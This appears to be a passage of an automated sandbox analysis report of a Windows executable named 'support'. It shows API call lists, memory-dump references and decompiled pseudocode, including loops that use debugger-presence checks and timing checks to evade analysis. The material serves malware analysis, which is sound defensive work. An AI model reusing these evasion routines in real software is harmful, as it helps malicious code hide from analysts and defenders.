_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,006F5B9C,?,0000001F,00000000,00000001), ref: 003B3730
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,006F62E8,?,?,?,00000104,00000000,?,006F5B9C,?,0000001F,00000000,00000001), ref: 003B37BF
CreateThread.KERNELBASE(00000000,00000000,Function_00006560,00000000,00000000,00000000), ref: 003B37D6
CloseHandle.KERNEL32(00000000), ref: 003B37E2
Sleep.KERNELBASE(000003E8), ref: 003B37ED
CreateThread.KERNELBASE(00000000,00000000,Function_00006620,00000000,00000000,00000000), ref: 003B3802
FindWindowA.USER32(?,00000000), ref: 003B3875
GetModuleFileNameA.KERNEL32(00000000), ref: 003B38BE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 003B3955
rand.API-MS-WIN-CRT-UTILITY-L1-1-0(003C15C4), ref: 003B39BA

Strings

[^K/, xrefs: 003B354B
Unknown, xrefs: 003B391F

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateThread_time64randsrand$CloseFileFindHandleInformationModuleNameSleepVolumeWindow
String ID: Unknown$[^K/
API String ID: 2583763505-1590109740
Opcode ID: 77aacf004024110d50fe02da2cc0e654253850f8d3df256eaaf872e0d4a93457
Instruction ID: 2e1150dfa135c0343d911f83b5d885229db27da10e1f91e9f55dded9f76a9462
Opcode Fuzzy Hash: 77aacf004024110d50fe02da2cc0e654253850f8d3df256eaaf872e0d4a93457
Instruction Fuzzy Hash: 54D136319042689BDB26DB28CC8DBEDBBB4AF55304F1041D8E549AB2C2DB756F88CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003B6560 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E003B6560() {
				signed int _v8;
				CHAR* _v12;
				CHAR* _v16;
				signed int _t8;
				char _t11;
				void* _t16;
				void* _t22;
				char _t25;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t31;

				_t8 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t8 ^ _t31;
				_t28 = __imp__CheckRemoteDebuggerPresent;
				L1:
				while(1) {
					if(E003B64B0(_t25) != 0) {
						L13:
						_t11 = 1;
						L14:
						 *0x6f62f5 = _t11;
						__imp__GetTickCount64();
						asm("adc edx, 0x0");
						 *0x6f62f8 = _t11 + 0xa68;
						 *0x6f62fc = _t26; // executed
						Sleep(0x64); // executed
						continue;
					}
					_v12 = 0;
					if(IsDebuggerPresent() != 0) {
						goto L13;
					}
					_t16 =  *_t28(GetModuleHandleA(0),  &_v12); // executed
					if(_t16 == 0 || _v12 == 0) {
						if(E003B6450(_t25) != 0) {
							goto L13;
						}
						_v16 = 0;
						if(IsDebuggerPresent() != 0) {
							L10:
							_t25 = 1;
							L11:
							if(_t25 != E003B64B0(_t25)) {
								goto L13;
							}
							_t11 = 0;
							goto L14;
						}
						_t22 =  *_t28(GetModuleHandleA(0),  &_v16); // executed
						if(_t22 == 0 || _v16 == 0) {
							_t25 = 0;
							goto L11;
						} else {
							goto L10;
						}
					} else {
						goto L13;
					}
				}
			}

0x003b6566
0x003b656d
0x003b657f
0x00000000
0x003b6585
0x003b658c
0x003b65ee
0x003b65ee
0x003b65f0
0x003b65f0
0x003b65f5
0x003b6602
0x003b6605
0x003b660a
0x003b6610
0x00000000
0x003b6610
0x003b658e
0x003b6599
0x00000000
0x00000000
0x003b65a4
0x003b65a8
0x003b65b7
0x00000000
0x00000000
0x003b65b9
0x003b65c4
0x003b65df
0x003b65df
0x003b65e1
0x003b65e8
0x00000000
0x00000000
0x003b65ea
0x00000000
0x003b65ea
0x003b65cf
0x003b65d3
0x003b65db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b65a8

APIs

IsDebuggerPresent.KERNEL32 ref: 003B6595
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 003B65A1
CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 003B65A4
IsDebuggerPresent.KERNEL32 ref: 003B65C0
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 003B65CC
CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 003B65CF
GetTickCount64.KERNEL32 ref: 003B65F5
Sleep.KERNELBASE(00000064), ref: 003B6610

Strings

[^K/, xrefs: 003B6566

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: DebuggerPresent$CheckHandleModuleRemote$Count64SleepTick
String ID: [^K/
API String ID: 144959145-4166871755
Opcode ID: 7c6fbcc737190b99644b69452c663ecea5b9304636a04b324ec6a796e01ef30f
Instruction ID: 33a6303433e3ef0b1c8a79ab660054acc53586a3cf7909c85c94ce7c84532e3e
Opcode Fuzzy Hash: 7c6fbcc737190b99644b69452c663ecea5b9304636a04b324ec6a796e01ef30f
Instruction Fuzzy Hash: D411E270900218ABEF229BA1CC42FEE77BCAB0234CF014062D700C794BDA3CD9A49B64

Uniqueness

Uniqueness Score: -1.00%

Function 003B6620 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E003B6620(void* __ecx, void* __edx, void* __edi) {
				signed char _v8;
				void* _t8;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t18;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t15 = __edi;
				_t14 = __edx;
				_v8 = 0;
				_v8 =  *( *[fs:0x30] + 0x68);
				if((_v8 & 0x00000070) != 0) {
					E003B64D0();
				}
				_t19 = __imp__GetTickCount64;
				_t8 =  *_t19(_t18);
				_t22 = _t14 -  *0x6f62fc; // 0x0
				if(_t22 <= 0 && (_t22 < 0 || _t8 <=  *0x6f62f8)) {
					_push(_t15);
					while( *0x6f62f5 == 0) {
						Sleep(0x3e8); // executed
						_t11 =  *_t19();
						_t25 = _t14 -  *0x6f62fc; // 0x0
						if(_t25 < 0 || _t25 <= 0 && _t11 <=  *0x6f62f8) {
							continue;
						}
						break;
					}
				}
				 *0x6f62f5 = 1;
				E003B64D0();
				return 0;
			}

0x003b6620
0x003b6620
0x003b6624
0x003b6634
0x003b663b
0x003b663d
0x003b663d
0x003b6643
0x003b6649
0x003b664b
0x003b6651
0x003b665d
0x003b6664
0x003b6672
0x003b6674
0x003b6676
0x003b667c
0x00000000
0x00000000
0x00000000
0x003b667c
0x003b6688
0x003b6689
0x003b6690
0x003b669b

APIs

GetTickCount64.KERNEL32 ref: 003B6649
Sleep.KERNELBASE(000003E8), ref: 003B6672
GetTickCount64.KERNEL32 ref: 003B6674

Part of subcall function 003B64D0: GetModuleHandleA.KERNEL32(?), ref: 003B653C
Part of subcall function 003B64D0: GetProcAddress.KERNEL32(00000000,003B6695), ref: 003B6547

Strings

p, xrefs: 003B6637

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Count64Tick$AddressHandleModuleProcSleep
String ID: p
API String ID: 2875546093-2181537457
Opcode ID: 6dd66051845eaa0ff3695d3db071720621cc567f9abc4b919ceded26faf55eee
Instruction ID: af88cf5c0c3fc6144c097c7b493c9ab89d2b2ada39f1a037150dcc7cda247c25
Opcode Fuzzy Hash: 6dd66051845eaa0ff3695d3db071720621cc567f9abc4b919ceded26faf55eee
Instruction Fuzzy Hash: 00012630A012889BC713EB28E842BDCB7E9A711708F025166E60093963C27C6E80CA84

Uniqueness

Uniqueness Score: -1.00%

Function 003BF0FA Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E003BF0FA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E003BF106); // executed
				return _t1;
			}

0x003bf0ff
0x003bf105

APIs

SetUnhandledExceptionFilter.KERNELBASE(003BF106,003BE9D2), ref: 003BF0FF

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a46effbe983414acff24643585f0cc903ea695dfb974e9f1c0b5ef12fe4f0859
Instruction ID: 55e5367b89d6c9afe48943fb09fb26b6f673a6853449cf527adeb422ac4b013b
Opcode Fuzzy Hash: a46effbe983414acff24643585f0cc903ea695dfb974e9f1c0b5ef12fe4f0859
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 003B5420 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(4B5EE95B,?,?), ref: 003B54FE
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,4B5EE95B,?,?), ref: 003B5558
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,?,4B5EE95B,?,?), ref: 003B5581
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 003B55A8
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000), ref: 003B560C
?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 003B5619
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140 ref: 003B5628

Strings

[^K/, xrefs: 003B5437

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
String ID: [^K/
API String ID: 1492985063-4166871755
Opcode ID: cdc6ffd0ea75f68ab5277245ae97c844785b0e069d2bd8c316ff17586fd1d85c
Instruction ID: e829b3a2576c0900c3fa8c0ccd4937da6b94a024d0a2a3fb620b2a1c4791dbb5
Opcode Fuzzy Hash: cdc6ffd0ea75f68ab5277245ae97c844785b0e069d2bd8c316ff17586fd1d85c
Instruction Fuzzy Hash: 2B719235A00A14CFCB15CF58C984B99BBF2FF4A319F1A8299DA16AB791C730EC40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003B61D0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140 ref: 003B628F
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,4B5EE95B,73CB1EA0,?,0000002A,003BF8E0,000000FF,?,003B3ADF,?), ref: 003B62E2
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(0000002A,00000010,00000000,?,4B5EE95B,73CB1EA0,?,0000002A,003BF8E0,000000FF,?,003B3ADF,?), ref: 003B630B
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,0000002A,003BF8E0,000000FF,?,003B3ADF,?), ref: 003B6332
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000,?,0000002A,003BF8E0,000000FF), ref: 003B6392
?uncaught_exception@std@@YA_NXZ.MSVCP140(?,0000002A,003BF8E0,000000FF), ref: 003B639F
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,0000002A,003BF8E0,000000FF), ref: 003B63AE

Strings

[^K/, xrefs: 003B61E7

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
String ID: [^K/
API String ID: 1492985063-4166871755
Opcode ID: ff48837c7d8ec6e26d619ad9d5462cbf6db217b9b70667d9a1964ffa67216ceb
Instruction ID: 6f4b7c46bedae10051ec79235834674b19f5eb5c495a277db35d4b2666f4fa3e
Opcode Fuzzy Hash: ff48837c7d8ec6e26d619ad9d5462cbf6db217b9b70667d9a1964ffa67216ceb
Instruction Fuzzy Hash: 10615A79E00504CFDB15CF58C585BA9BBF5BF49318F258168EA0A9B7A6C734EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003B5FD0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E003B5FD0(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v25;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				signed int _t73;
				char _t77;
				signed char _t79;
				char* _t87;
				signed char _t89;
				intOrPtr* _t95;
				signed int _t102;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr* _t108;
				intOrPtr* _t114;
				intOrPtr* _t120;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed char _t129;
				intOrPtr* _t131;
				intOrPtr* _t134;
				signed int _t136;
				void* _t137;
				intOrPtr _t144;

				_t127 = __edx;
				_push(0xffffffff);
				_push(E003BF8A8);
				_push( *[fs:0x0]);
				_t73 =  *0x3c500c; // 0x4b5ee95b
				_push(_t73 ^ _t136);
				 *[fs:0x0] =  &_v16;
				_v20 = _t137 - 0x34;
				_t134 = __edx;
				_t131 = __ecx;
				_t102 = 0;
				_v36 = __ecx;
				_v48 = 0;
				_v25 = 0;
				_t77 =  *((intOrPtr*)( *__ecx + 4));
				_v56 = __ecx;
				_t108 =  *((intOrPtr*)(_t77 + __ecx + 0x38));
				if(_t108 != 0) {
					_t77 =  *((intOrPtr*)( *_t108 + 4))();
				}
				_v8 = 0;
				__imp__?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z(0); // executed
				_v52 = _t77;
				_v8 = 1;
				if(_t77 == 0) {
					L26:
					_t79 =  *( *_t131 + 4);
					 *((intOrPtr*)(_t79 + _t131 + 0x20)) = 0;
					 *((intOrPtr*)(_t79 + _t131 + 0x24)) = 0;
					if(_v25 == 0) {
						_t102 = _t102 | 0x00000002;
					}
					__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(_t102, 0);
					_v8 = 6;
					_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 4)) + _v56 + 0x38));
					if(_t114 != 0) {
						 *((intOrPtr*)( *_t114 + 8))();
					}
					 *[fs:0x0] = _v16;
					return _t131;
				} else {
					__imp__?getloc@ios_base@std@@QBE?AVlocale@2@XZ( &_v64);
					_v8 = 2;
					_v40 = E003B5320( &_v64, _t127);
					_v8 = 3;
					_t120 = _v60;
					if(_t120 != 0) {
						_t126 =  *((intOrPtr*)( *_t120 + 8))();
						if(_t126 != 0) {
							 *((intOrPtr*)( *_t126))(1);
						}
					}
					_t87 = _t134;
					if( *((intOrPtr*)(_t134 + 0x14)) >= 0x10) {
						_t87 =  *_t134;
					}
					 *((intOrPtr*)(_t134 + 0x10)) = 0;
					 *_t87 = 0;
					_v8 = 4;
					_t89 =  *( *_t131 + 4);
					_t144 =  *((intOrPtr*)(_t89 + _t131 + 0x24));
					_t104 =  *((intOrPtr*)(_t89 + _t131 + 0x20));
					_v32 = _t104;
					if(_t144 < 0 || _t144 <= 0 && _t104 == 0 || _t104 >= 0x7fffffff) {
						_t104 = 0x7fffffff;
						_v32 = 0x7fffffff;
					}
					__imp__?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ();
					while(1) {
						_t129 = _t89;
						if(_t104 == 0) {
							break;
						}
						if(_t129 != 0xffffffff) {
							if(( *( *((intOrPtr*)(_v40 + 0xc)) + (_t129 & 0x000000ff) * 2) & 0x00000048) != 0) {
								break;
							}
							_t123 =  *((intOrPtr*)(_t134 + 0x10));
							_t105 =  *((intOrPtr*)(_t134 + 0x14));
							_v24 = _t129;
							if(_t123 >= _t105) {
								_push(_v24);
								_v44 = 0;
								_push(_v44);
								E003B59B0(_t105, _t134, _t131, _t123);
							} else {
								 *((intOrPtr*)(_t134 + 0x10)) = _t123 + 1;
								_t95 = _t134;
								if(_t105 >= 0x10) {
									_t95 =  *_t134;
								}
								 *(_t95 + _t123) = _t129;
								 *((char*)(_t95 + _t123 + 1)) = 0;
							}
							_t104 = _v32 - 1;
							_v25 = 1;
							_v32 = _t104;
							_t89 =  *( *_t131 + 4);
							__imp__?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ();
							continue;
						}
						_t33 = _t89 + 2; // 0x2
						_t102 = _t33;
						L25:
						_v8 = 1;
						goto L26;
					}
					_t102 = 0;
					goto L25;
				}
			}

0x003b5fd0
0x003b5fd3
0x003b5fd5
0x003b5fe0
0x003b5fe7
0x003b5fee
0x003b5ff2
0x003b5ff8
0x003b5ffb
0x003b5ffd
0x003b6001
0x003b6003
0x003b6006
0x003b6009
0x003b600c
0x003b600f
0x003b6012
0x003b6018
0x003b601c
0x003b601c
0x003b6023
0x003b602a
0x003b6030
0x003b6033
0x003b603c
0x003b6169
0x003b616f
0x003b6172
0x003b617a
0x003b6182
0x003b6184
0x003b6184
0x003b6191
0x003b6197
0x003b61a6
0x003b61ac
0x003b61b0
0x003b61b0
0x003b61b8
0x003b61c6
0x003b6042
0x003b604d
0x003b6055
0x003b605e
0x003b6061
0x003b6065
0x003b606a
0x003b6071
0x003b6075
0x003b607b
0x003b607b
0x003b6075
0x003b6081
0x003b6083
0x003b6085
0x003b6085
0x003b6087
0x003b608e
0x003b6091
0x003b6097
0x003b609a
0x003b609f
0x003b60a3
0x003b60a6
0x003b60b6
0x003b60bb
0x003b60bb
0x003b60c2
0x003b60c8
0x003b60c8
0x003b60cc
0x00000000
0x00000000
0x003b60d1
0x003b60e8
0x00000000
0x00000000
0x003b60ea
0x003b60ed
0x003b60f0
0x003b60f5
0x003b6110
0x003b6113
0x003b6117
0x003b611d
0x003b60f7
0x003b60fa
0x003b60fd
0x003b6102
0x003b6104
0x003b6104
0x003b6106
0x003b6109
0x003b6109
0x003b6127
0x003b6128
0x003b612c
0x003b612f
0x003b6136
0x00000000
0x003b6136
0x003b60d3
0x003b60d3
0x003b6162
0x003b6162
0x00000000
0x003b6162
0x003b613e
0x00000000
0x003b613e

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000000,4B5EE95B,76C86490,73413D00,0000003A,?,?,?,?,?,00000000,003BF8A8,000000FF,?,003B3E6F), ref: 003B602A
?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,?,?,?,?,00000000,003BF8A8,000000FF,?,003B3E6F), ref: 003B604D
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,?,?,?,00000000,003BF8A8,000000FF,?,003B3E6F), ref: 003B60C2
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000000,?), ref: 003B6136
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?,?,?,?,00000000,003BF8A8,000000FF,?,003B3E6F), ref: 003B6191

Strings

[^K/, xrefs: 003B5FE7

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@Vlocale@2@
String ID: [^K/
API String ID: 481934583-4166871755
Opcode ID: 47f9a2471830f89a0583eb2410bcf1b66f94e043d97fb971954fc284e7ed86a1
Instruction ID: 13789b5182d319ac0cc622052ca6c78a3b4e7e680d4d1d963e3697455e04f08a
Opcode Fuzzy Hash: 47f9a2471830f89a0583eb2410bcf1b66f94e043d97fb971954fc284e7ed86a1
Instruction Fuzzy Hash: BB61AC34A05244DFCB16CF59C585BAEBBF5BF08308F1441ADE6069BBA2C779AD04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003B34A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E003B34A0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				long _v12;
				signed short _v34;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v36;
				struct _COORD _v40;
				signed int _t11;
				void* _t24;
				long _t30;
				struct _COORD _t32;
				signed int _t33;

				_t11 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t11 ^ _t33;
				_v40 = 0;
				_t24 = GetStdHandle(0xfffffff5);
				GetConsoleScreenBufferInfo(_t24,  &_v36); // executed
				_t32 = _v40;
				_t30 = _v34 * _v36.dwSize;
				FillConsoleOutputCharacterA(_t24, 0x20, _t30, _t32,  &_v12); // executed
				FillConsoleOutputAttribute(_t24, _v36.wAttributes, _t30, _t32,  &_v12); // executed
				SetConsoleCursorPosition(_t24, _t32); // executed
				return E003BE3D0(_v8 ^ _t33);
			}

0x003b34a6
0x003b34ad
0x003b34b7
0x003b34c0
0x003b34c7
0x003b34d8
0x003b34dc
0x003b34e4
0x003b34f4
0x003b34fc
0x003b3512

APIs

GetStdHandle.KERNEL32(000000F5), ref: 003B34BA
GetConsoleScreenBufferInfo.KERNELBASE(00000000,?), ref: 003B34C7
FillConsoleOutputCharacterA.KERNELBASE(00000000,00000020,?,?,?), ref: 003B34E4
FillConsoleOutputAttribute.KERNELBASE(00000000,?,?,?,?), ref: 003B34F4
SetConsoleCursorPosition.KERNELBASE(00000000,?), ref: 003B34FC

Strings

[^K/, xrefs: 003B34A6

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
